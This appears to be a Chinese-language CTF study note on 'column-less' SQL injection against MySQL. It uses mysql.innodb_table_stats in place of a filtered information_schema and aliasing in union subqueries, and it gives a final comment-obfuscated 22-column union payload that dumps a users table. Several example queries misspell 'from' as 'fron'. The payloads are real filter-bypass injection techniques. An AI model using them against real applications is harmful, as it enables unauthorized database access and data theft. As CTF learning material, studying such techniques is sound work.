知识点:
当or 被过滤时不能使用information_schema;
就可以使用mysql.innodb_table_stats代替;
information_schema可以查到所有的数据库和表名和列名;
但是mysql.innodb_table_stats只查到表名,所以不知道列名;
就有了无列名注入
正常使用:
select `2` from (select 1,2,3 union select * from user)a;
但是如果过滤了``反引号,就用到取别名的操作
select b fron (select 1 as a,2 as b,3 as c union select * fron xxx)n;
防止多余的话,也可以
select b fron (select 1,2 as b,3 union select * fron xxx)n;
知识点来源:SQL注入之无列名注入_noViC4的博客-CSDN博客_无列名注入
在我们进行sql注入的时候,有时候information_schema这个库可能会因为过滤而无法调用,这时我们就不能通过这个库来查出表名和列名。不过我们可以通过两种方法来查出表名:
但是上述两种方法都只能查出表名,无法查到列名,这时我们就要用到无列名注入了。无列名注入,顾名思义,就是不需要列名就能注出数据的注入。
使用:
这道题过滤了空格,用/**/绕过;
or 就用mysql.innodb_table_stats代替
用不了order by ;只能一个一个测试出列数;有22列;
(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database())
最终pay:
-1'union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)k),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'